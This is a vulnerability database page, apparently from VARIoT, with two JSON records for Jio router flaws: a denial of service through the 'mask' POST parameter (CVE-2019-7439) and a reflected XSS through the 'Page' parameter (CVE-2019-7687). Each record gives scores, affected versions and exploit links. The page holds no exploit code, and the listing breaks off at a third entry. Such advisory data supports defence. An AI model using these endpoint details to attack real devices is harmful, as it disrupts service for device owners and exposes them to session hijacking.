Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
7 vulnerabilities by jio
VAR-201903-0479
Vulnerability from variot - Updated: 2023-12-18 14:05cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter. JioFi 4G M2S The device contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. There is a security vulnerability in the cgi-bin/qcmap_web_cgi URL in JioFi 4G M2S version 1.0.2. An attacker can exploit this vulnerability by using a POST request 'mask' to cause a denial of service (hang)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0479",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jiofi 4g m2s",
"scope": "eq",
"trust": 1.0,
"vendor": "jio",
"version": "1.0.2"
},
{
"model": "jiofi m2s",
"scope": "eq",
"trust": 0.8,
"vendor": "reliance jio infocomm",
"version": "1.0.2"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"db": "NVD",
"id": "CVE-2019-7439"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:jio:jiofi_4g_m2s_firmware:1.0.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:jio:jiofi_4g_m2s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7439"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vikas Chaudhary",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7439",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 6.1,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7439",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 6.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "VHN-158874",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7439",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7439",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-796",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158874",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158874"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"db": "NVD",
"id": "CVE-2019-7439"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices allows a DoS (Hang) via the mask POST parameter. JioFi 4G M2S The device contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. There is a security vulnerability in the cgi-bin/qcmap_web_cgi URL in JioFi 4G M2S version 1.0.2. An attacker can exploit this vulnerability by using a POST request \u0027mask\u0027 to cause a denial of service (hang)",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7439"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"db": "VULHUB",
"id": "VHN-158874"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7439",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "152626",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "46752",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002848",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-796",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158874",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158874"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"db": "NVD",
"id": "CVE-2019-7439"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
]
},
"id": "VAR-201903-0479",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158874"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T14:05:11.587000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "JioFi M2",
"trust": 0.8,
"url": "https://www.jio.com/shop/en-in/jiofi-m2/p/491193575"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-400",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158874"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"db": "NVD",
"id": "CVE-2019-7439"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://gkaim.com/cve-2019-7439-vikas-chaudhary/"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/152626/jiofi-4g-m2s-1.0.2-denial-of-service.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/46752/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7439"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7439"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/46752"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158874"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"db": "NVD",
"id": "CVE-2019-7439"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158874"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"db": "NVD",
"id": "CVE-2019-7439"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158874"
},
{
"date": "2019-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"date": "2019-03-21T16:01:13.860000",
"db": "NVD",
"id": "CVE-2019-7439"
},
{
"date": "2019-03-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158874"
},
{
"date": "2019-04-24T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002848"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-7439"
},
{
"date": "2020-10-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4G M2S Device depletion vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002848"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-796"
}
],
"trust": 0.6
}
}
VAR-201905-0418
Vulnerability from variot - Updated: 2023-12-18 13:52cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data. JioFi 4 jmr1140 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Reliance Jio Infocomm JioFi 4 jmr1140 is a portable wireless router device from Reliance Jio Infocomm in Australia. A cross-site scripting vulnerability exists in cgi-bin/qcmap_web_cgi in Reliance Jio Infocomm JioFi 4 jmr1140. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-0418",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "jmr1140",
"scope": "eq",
"trust": 1.0,
"vendor": "jio",
"version": "amtel_jmr1140_r12.07"
},
{
"model": "jiofi jmr1140",
"scope": "eq",
"trust": 0.8,
"vendor": "reliance jio infocomm",
"version": "amtel_jmr1140_r12.07"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"db": "NVD",
"id": "CVE-2019-7687"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:jio:jmr1140_firmware:amtel_jmr1140_r12.07:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:jio:jmr1140:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7687"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ronnie T Baby",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7687",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-7687",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-159122",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-7687",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7687",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-618",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-159122",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159122"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"db": "NVD",
"id": "CVE-2019-7687"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data. JioFi 4 jmr1140 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Reliance Jio Infocomm JioFi 4 jmr1140 is a portable wireless router device from Reliance Jio Infocomm in Australia. A cross-site scripting vulnerability exists in cgi-bin/qcmap_web_cgi in Reliance Jio Infocomm JioFi 4 jmr1140. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7687"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"db": "VULHUB",
"id": "VHN-159122"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7687",
"trust": 2.5
},
{
"db": "PACKETSTORM",
"id": "151654",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "46363",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004433",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-618",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-159122",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159122"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"db": "NVD",
"id": "CVE-2019-7687"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
]
},
"id": "VAR-201905-0418",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-159122"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:52:21.793000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.jio.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159122"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"db": "NVD",
"id": "CVE-2019-7687"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/151654/jiofi-4-jmr-1140-cross-site-scripting.html"
},
{
"trust": 1.7,
"url": "https://drive.google.com/file/d/1ehw-xfjuqfy2scjkww_heo-7nzkwffw6/view?usp=sharing"
},
{
"trust": 1.7,
"url": "https://drive.google.com/file/d/1gldf8rcrepnlhrgfeltmsjsyuszvxkhw/view?usp=sharing"
},
{
"trust": 1.7,
"url": "https://jiosecuritybugs.blogspot.com/2019/02/cve-2019-7687-jiofi-4-jmr1140.html"
},
{
"trust": 1.7,
"url": "https://www.exploit-db.com/exploits/46363/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7687"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7687"
},
{
"trust": 0.8,
"url": "https://drive.google.com/file/d/1gldf8rcrepnlhrgfeltmsjsyuszvxkhw/view"
},
{
"trust": 0.8,
"url": "https://drive.google.com/file/d/1ehw-xfjuqfy2scjkww_heo-7nzkwffw6/view"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/46363"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-159122"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"db": "NVD",
"id": "CVE-2019-7687"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-159122"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"db": "NVD",
"id": "CVE-2019-7687"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-07T00:00:00",
"db": "VULHUB",
"id": "VHN-159122"
},
{
"date": "2019-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"date": "2019-05-07T19:29:01.800000",
"db": "NVD",
"id": "CVE-2019-7687"
},
{
"date": "2019-02-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-08T00:00:00",
"db": "VULHUB",
"id": "VHN-159122"
},
{
"date": "2019-06-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-004433"
},
{
"date": "2019-05-08T15:52:58.680000",
"db": "NVD",
"id": "CVE-2019-7687"
},
{
"date": "2019-05-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "JioFi 4 jmr1140 Device cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-004433"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-618"
}
],
"trust": 0.6
}
}
VAR-201808-0638
